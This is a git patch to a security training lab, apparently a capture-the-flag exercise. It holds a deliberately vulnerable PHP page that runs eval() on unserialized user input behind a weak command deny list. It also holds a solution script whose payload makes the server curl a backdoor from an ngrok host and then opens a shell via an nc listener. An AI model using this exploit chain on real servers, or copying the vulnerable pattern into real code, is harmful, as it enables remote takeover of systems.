From 356cf113102e28e6bfa53e59cb3bed732a138312 Mon Sep 17 00:00:00 2001
From: Carina Deaconu <carina99br@gmail.com>
Date: Fri, 28 Jul 2023 15:23:21 +0300
Subject: [PATCH] Add random name for the backdoor file + format files

Signed-off-by: Carina Deaconu <carina99br@gmail.com>
---
 .../handy-tool/sol/backdoor_name.txt          |   1 +
 .../handy-tool/sol/make_backdoor.php          |  23 +-
 .../activities/handy-tool/sol/solution.sh     |   6 +-
 .../activities/handy-tool/src/index.php       | 200 +++++++++---------
 4 files changed, 117 insertions(+), 113 deletions(-)
 create mode 100644 exotic-attacks/activities/handy-tool/sol/backdoor_name.txt

diff --git a/exotic-attacks/activities/handy-tool/sol/backdoor_name.txt b/exotic-attacks/activities/handy-tool/sol/backdoor_name.txt
new file mode 100644
index 00000000..9d3ccf60
--- /dev/null
+++ b/exotic-attacks/activities/handy-tool/sol/backdoor_name.txt
@@ -0,0 +1 @@
+f2ft24backdoor.php
diff --git a/exotic-attacks/activities/handy-tool/sol/make_backdoor.php b/exotic-attacks/activities/handy-tool/sol/make_backdoor.php
index 9161a073..e2348a5f 100644
--- a/exotic-attacks/activities/handy-tool/sol/make_backdoor.php
+++ b/exotic-attacks/activities/handy-tool/sol/make_backdoor.php
@@ -1,16 +1,17 @@
 <?php
-	$NGROK_HOST = ""; // TODO: ngrok host (check README.md)
-	$NGROK_PORT = 0; // TODO: ngrok port (check README.md)
+    $NGROK_HOST = ""; // TODO: ngrok host (check README.md)
+    $NGROK_PORT = 0; // TODO: ngrok port (check README.md)
 
-	class PHPClass
-	{
-		public $condition = true;
-		public $prop = "";
+    class PHPClass
+    {
+        public $condition = true;
+        public $prop = "";
 
-		public function __construct($host, $port) {
-			$this->prop = "system('curl http://".$host.":".$port." -o backdoor.php');";
-		}
-	}
+        public function __construct($host, $port) {
+            $backdoor_name = trim(file_get_contents("backdoor_name.txt"));
+            $this->prop = "system('curl http://".$host.":".$port." -o $backdoor_name');";
+        }
+    }
 
-	echo urlencode(serialize(new PHPClass($NGROK_HOST, $NGROK_PORT)));
+    echo urlencode(serialize(new PHPClass($NGROK_HOST, $NGROK_PORT)));
 ?>
diff --git a/exotic-attacks/activities/handy-tool/sol/solution.sh b/exotic-attacks/activities/handy-tool/sol/solution.sh
index ffded322..e2487b5b 100755
--- a/exotic-attacks/activities/handy-tool/sol/solution.sh
+++ b/exotic-attacks/activities/handy-tool/sol/solution.sh
@@ -56,7 +56,8 @@ echo
 backdoor_payload=$(php ./make_backdoor.php)
 curl "$URL/?tool=unserialize&input=$backdoor_payload&submit=Submit" > /dev/null
 
-echo "Step 5: Close the Flask app and open a new connection to your internal port using: \`nc -nlvk 1234\`"
+echo "Step 5: Close the Flask app and open a new connection to your internal port using: \`nc -nlv 1234\`"
+echo "You might need to add the -p option if you're working inside a VM."
 echo "Press any key to continue if you did it."
 while [ true ] ; do
     read -n 1
@@ -66,4 +67,5 @@ while [ true ] ; do
 done
 
 echo "Finally: Now I am accessing the backdoor; check the \`nc\` terminal..."
-curl "$URL""/backdoor.php"
+backdoor_name=$(cat backdoor_name.txt)
+curl "$URL""/""$backdoor_name"
diff --git a/exotic-attacks/activities/handy-tool/src/index.php b/exotic-attacks/activities/handy-tool/src/index.php
index 67dfe930..8936de93 100644
--- a/exotic-attacks/activities/handy-tool/src/index.php
+++ b/exotic-attacks/activities/handy-tool/src/index.php
@@ -1,100 +1,100 @@
-<?php
-class PHPClass {
-    public $condition;
-    public $prop;
-
-    function __construct() {
-
-    }
-
-    function __wakeup() {
-        $forbbiden_commands = [
-            "cat",
-            "head",
-            "grep",
-            "tail",
-            "tac",
-            "rev",
-            "awk",
-            "sed",
-            "more",
-            "cut",
-            "nl",
-            "less",
-            "sort",
-            "python",
-            "perl",
-            "m4", // similar to `cat`
-        ];
-
-        if (!isset($this->prop) or !isset($this->condition) or !$this->condition == true) {
-            return;
-        }
-
-        foreach ($forbbiden_commands as $cmd) {
-            if (strpos($this->prop, $cmd) !== false) {
-                return;
-            }
-        }
-
-        eval($this->prop);
-    }
-}
-?>
-
-<!DOCTYPE html>
-<html>
-    <head>
-        <meta charset="utf-8">
-        <meta name="viewport" content="width=device-width, initial-scale=1">
-        <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css">
-    </head>
-
-    <body>
-        <div>
-            <div class="container">
-                <div class="row">
-                    <div class="bg-white p-5 mx-auto col-md-8 col-10">
-                        <h3 class="display-3">Handy Tools<br></h3>
-                        <form method="GET">
-                            <div class="form-group">
-                                <label>Select tool</label>
-                                <select name="tool" class="form-control">
-                                    <option value="toupper">To Upper Case</option>
-                                    <option value="unserialize">Unserialize</option>
-                                    <option value="trim">Trim whitespaces</option>
-                                    <option value="manny">Guess my last name: Manny...</option>
-                                </select>
-                            </div>
-                            <div class="form-group">
-                                <label>Input</label>
-                                <input name="input" type="text" class="form-control">
-                                <small class="form-text text-muted"></small>
-                            </div>
-                            <?php
-                                if (isset($_GET['tool']) && $_GET['tool'] == 'toupper') {
-                                    echo var_dump(strtoupper($_GET['input']));
-                                    echo "<br>"; echo "<br>"; echo "<br>";
-                                } elseif (isset($_GET['tool']) && $_GET['tool'] == 'unserialize') {
-                                    echo var_dump(unserialize($_GET['input']));
-                                    echo "<br>"; echo "<br>"; echo "<br>";
-                                } elseif (isset($_GET['tool']) && $_GET['tool'] == 'trim') {
-                                    echo var_dump(str_replace(' ', '', $_GET['input']));
-                                    echo "<br>"; echo "<br>"; echo "<br>";
-                                } elseif (isset($_GET['tool']) && $_GET['tool'] == 'manny') {
-                                    if (strtolower($_GET['input']) == 'iscusitul')
-                                        echo "backup.zip";
-                                    else
-                                        echo "Wrong!";
-                                    echo "<br>"; echo "<br>"; echo "<br>";
-                                }
-                            ?>
-                            <input type="submit" class="btn btn-primary" name="submit" value="Submit" />
-                        </form>
-                    </div>
-                </div>
-            </div>
-        </div>
-    </body>
-
-</html>
+<?php
+class PHPClass {
+    public $condition;
+    public $prop;
+
+    function __construct() {
+
+    }
+
+    function __wakeup() {
+        $forbbiden_commands = [
+            "cat",
+            "head",
+            "grep",
+            "tail",
+            "tac",
+            "rev",
+            "awk",
+            "sed",
+            "more",
+            "cut",
+            "nl",
+            "less",
+            "sort",
+            "python",
+            "perl",
+            "m4", // similar to `cat`
+        ];
+
+        if (!isset($this->prop) or !isset($this->condition) or !$this->condition == true) {
+            return;
+        }
+
+        foreach ($forbbiden_commands as $cmd) {
+            if (strpos($this->prop, $cmd) !== false) {
+                return;
+            }
+        }
+
+        eval($this->prop);
+    }
+}
+?>
+
+<!DOCTYPE html>
+<html>
+    <head>
+        <meta charset="utf-8">
+        <meta name="viewport" content="width=device-width, initial-scale=1">
+        <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css">
+    </head>
+
+    <body>
+        <div>
+            <div class="container">
+                <div class="row">
+                    <div class="bg-white p-5 mx-auto col-md-8 col-10">
+                        <h3 class="display-3">Handy Tools<br></h3>
+                        <form method="GET">
+                            <div class="form-group">
+                                <label>Select tool</label>
+                                <select name="tool" class="form-control">
+                                    <option value="toupper">To Upper Case</option>
+                                    <option value="unserialize">Unserialize</option>
+                                    <option value="trim">Trim whitespaces</option>
+                                    <option value="manny">Guess my last name: Manny...</option>
+                                </select>
+                            </div>
+                            <div class="form-group">
+                                <label>Input</label>
+                                <input name="input" type="text" class="form-control">
+                                <small class="form-text text-muted"></small>
+                            </div>
+                            <?php
+                                if (isset($_GET['tool']) && $_GET['tool'] == 'toupper') {
+                                    echo var_dump(strtoupper($_GET['input']));
+                                    echo "<br>"; echo "<br>"; echo "<br>";
+                                } elseif (isset($_GET['tool']) && $_GET['tool'] == 'unserialize') {
+                                    echo var_dump(unserialize($_GET['input']));
+                                    echo "<br>"; echo "<br>"; echo "<br>";
+                                } elseif (isset($_GET['tool']) && $_GET['tool'] == 'trim') {
+                                    echo var_dump(str_replace(' ', '', $_GET['input']));
+                                    echo "<br>"; echo "<br>"; echo "<br>";
+                                } elseif (isset($_GET['tool']) && $_GET['tool'] == 'manny') {
+                                    if (strtolower($_GET['input']) == 'iscusitul')
+                                        echo "backup.zip";
+                                    else
+                                        echo "Wrong!";
+                                    echo "<br>"; echo "<br>"; echo "<br>";
+                                }
+                            ?>
+                            <input type="submit" class="btn btn-primary" name="submit" value="Submit" />
+                        </form>
+                    </div>
+                </div>
+            </div>
+        </div>
+    </body>
+
+</html>